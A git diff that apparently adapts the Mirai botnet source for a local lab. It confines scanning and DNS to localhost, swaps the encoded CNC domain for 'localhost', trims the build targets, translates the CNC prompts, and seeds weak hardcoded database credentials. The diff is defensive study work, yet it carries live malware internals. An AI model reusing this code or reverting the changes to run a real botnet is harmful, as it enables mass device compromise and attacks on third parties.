diff --git a/mirai/bot/includes.h b/mirai/bot/includes.h
index 63eeeb6..11e279e 100755
--- a/mirai/bot/includes.h
+++ b/mirai/bot/includes.h
@@ -28,7 +28,7 @@ typedef uint16_t port_t;
 #define CNC_OP_PROXY        0x30
 #define CNC_OP_ATTACK       0x40
 
-ipv4_t LOCAL_ADDR;
+extern ipv4_t LOCAL_ADDR;
 
 #ifdef DEBUG
 static char *outptr;
diff --git a/mirai/bot/main.c b/mirai/bot/main.c
index 8c0510f..df269ac 100755
--- a/mirai/bot/main.c
+++ b/mirai/bot/main.c
@@ -23,6 +23,7 @@
 #include "scanner.h"
 #include "util.h"
 #include "resolv.h"
+ipv4_t LOCAL_ADDR;
 
 static void anti_gdb_entry(int);
 static void resolve_cnc_addr(void);
@@ -155,10 +156,8 @@ int main(int argc, char **args)
 
     attack_init();
     killer_init();
-#ifndef DEBUG
 #ifdef MIRAI_TELNET
     scanner_init();
-#endif
 #endif
 
     while (TRUE)
diff --git a/mirai/bot/resolv.c b/mirai/bot/resolv.c
index ea1f62d..b7dc633 100755
--- a/mirai/bot/resolv.c
+++ b/mirai/bot/resolv.c
@@ -81,8 +81,8 @@ struct resolv_entries *resolv_lookup(char *domain)
 
     util_zero(&addr, sizeof (struct sockaddr_in));
     addr.sin_family = AF_INET;
-    addr.sin_addr.s_addr = INET_ADDR(8,8,8,8);
-    addr.sin_port = htons(53);
+    addr.sin_addr.s_addr = INET_ADDR(127,0,0,1);
+    addr.sin_port = htons(55);
 
     // Set up the dns query
     dnsh->id = dns_id;
diff --git a/mirai/bot/scanner.c b/mirai/bot/scanner.c
index 615aa93..dfe53f0 100755
--- a/mirai/bot/scanner.c
+++ b/mirai/bot/scanner.c
@@ -700,6 +700,9 @@ static ipv4_t get_random_ip(void)
           (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
     );
 
+    o1 = 127;
+    o2 = 0;
+    o3 = 0;
     return INET_ADDR(o1,o2,o3,o4);
 }
 
diff --git a/mirai/bot/scanner.h b/mirai/bot/scanner.h
index 3669463..a8d71d8 100755
--- a/mirai/bot/scanner.h
+++ b/mirai/bot/scanner.h
@@ -5,8 +5,8 @@
 #include "includes.h"
 
 #ifdef DEBUG
-#define SCANNER_MAX_CONNS   128
-#define SCANNER_RAW_PPS     160
+#define SCANNER_MAX_CONNS   16
+#define SCANNER_RAW_PPS     20
 #else
 #define SCANNER_MAX_CONNS   128
 #define SCANNER_RAW_PPS     160
diff --git a/mirai/bot/table.c b/mirai/bot/table.c
index 13b341e..18ffc79 100755
--- a/mirai/bot/table.c
+++ b/mirai/bot/table.c
@@ -15,10 +15,10 @@ struct table_value table[TABLE_MAX_KEYS];
 
 void table_init(void)
 {
-    add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); // cnc.changeme.com
+    add_entry(TABLE_CNC_DOMAIN, "NMACNJMQV\"", 10); // cnc.changeme.com
     add_entry(TABLE_CNC_PORT, "\x22\x35", 2);   // 23
 
-    add_entry(TABLE_SCAN_CB_DOMAIN, "\x50\x47\x52\x4D\x50\x56\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 29); // report.changeme.com
+    add_entry(TABLE_SCAN_CB_DOMAIN, "NMACNJMQV\"", 10); // report.changeme.com
     add_entry(TABLE_SCAN_CB_PORT, "\x99\xC7", 2);         // 48101
 
     add_entry(TABLE_EXEC_SUCCESS, "\x4E\x4B\x51\x56\x47\x4C\x4B\x4C\x45\x02\x56\x57\x4C\x12\x22", 15);
diff --git a/mirai/build.sh b/mirai/build.sh
index 51afd44..25720de 100755
--- a/mirai/build.sh
+++ b/mirai/build.sh
@@ -1,4 +1,5 @@
 #!/bin/bash
+set -ex
 
 FLAGS=""
 
@@ -49,10 +50,6 @@ elif [ "$1" == "release" ]; then
     go build -o release/scanListen tools/scanListen.go
 elif [ "$1" == "debug" ]; then
     gcc -std=c99 bot/*.c -DDEBUG "$FLAGS" -static -g -o debug/mirai.dbg
-    mips-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.mips
-    armv4l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm
-    armv6l-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.arm7
-    sh4-gcc -std=c99 -DDEBUG bot/*.c "$FLAGS" -static -g -o debug/mirai.sh4
     gcc -std=c99 tools/enc.c -g -o debug/enc
     gcc -std=c99 tools/nogdb.c -g -o debug/nogdb
     gcc -std=c99 tools/badbot.c -g -o debug/badbot
diff --git a/mirai/cnc/admin.go b/mirai/cnc/admin.go
index 28a2091..4a7411a 100755
--- a/mirai/cnc/admin.go
+++ b/mirai/cnc/admin.go
@@ -5,7 +5,6 @@ import (
     "net"
     "time"
     "strings"
-    "io/ioutil"
     "strconv"
 )
 
@@ -25,17 +24,13 @@ func (this *Admin) Handle() {
         this.conn.Write([]byte("\033[?1049l"))
     }()
 
-    headerb, err := ioutil.ReadFile("prompt.txt")
-    if err != nil {
-        return
-    }
 
-    header := string(headerb)
+    header := ""
     this.conn.Write([]byte(strings.Replace(strings.Replace(header, "\r\n", "\n", -1), "\n", "\r\n", -1)))
 
     // Get username
     this.conn.SetDeadline(time.Now().Add(60 * time.Second))
-    this.conn.Write([]byte("\033[34;1mпользователь\033[33;3m: \033[0m"))
+    this.conn.Write([]byte("\033[34;1mUsername: \033[0m"))
     username, err := this.ReadLine(false)
     if err != nil {
         return
@@ -43,7 +38,7 @@ func (this *Admin) Handle() {
 
     // Get password
     this.conn.SetDeadline(time.Now().Add(60 * time.Second))
-    this.conn.Write([]byte("\033[34;1mпароль\033[33;3m: \033[0m"))
+    this.conn.Write([]byte("\033[34;1mPassword: \033[0m"))
     password, err := this.ReadLine(true)
     if err != nil {
         return
@@ -53,15 +48,15 @@ func (this *Admin) Handle() {
     this.conn.Write([]byte("\r\n"))
     spinBuf := []byte{'-', '\\', '|', '/'}
     for i := 0; i < 15; i++ {
-        this.conn.Write(append([]byte("\r\033[37;1mпроверив счета... \033[31m"), spinBuf[i % len(spinBuf)]))
+        this.conn.Write(append([]byte("\r\033[37;1mLogging in... \033[31m"), spinBuf[i % len(spinBuf)]))
         time.Sleep(time.Duration(300) * time.Millisecond)
     }
 
     var loggedIn bool
     var userInfo AccountInfo
     if loggedIn, userInfo = database.TryLogin(username, password); !loggedIn {
-        this.conn.Write([]byte("\r\033[32;1mпроизошла неизвестная ошибка\r\n"))
-        this.conn.Write([]byte("\033[31mнажмите любую клавишу для выхода. (any key)\033[0m"))
+        this.conn.Write([]byte("\r\033[32;1mUnknown error occurred!\r\n"))
+        this.conn.Write([]byte("\033[31mPress any key to exit.\033[0m"))
         buf := make([]byte, 1)
         this.conn.Read(buf)
         return
diff --git a/scripts/db.sql b/scripts/db.sql
index 6d873dc..fc660c6 100644
--- a/scripts/db.sql
+++ b/scripts/db.sql
@@ -1,4 +1,5 @@
 CREATE DATABASE mirai;
+USE mirai;
 
 CREATE TABLE `history` (
   `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
@@ -34,3 +35,6 @@ CREATE TABLE `whitelist` (
   PRIMARY KEY (`id`),
   KEY `prefix` (`prefix`)
 );
+INSERT INTO users VALUES (NULL, 'm1r41', 'p455w', 0, 0, 0, 0, -1, 1, 30, '');
+SET PASSWORD for 'root'@'localhost' = PASSWORD('password');
+FLUSH PRIVILEGES;
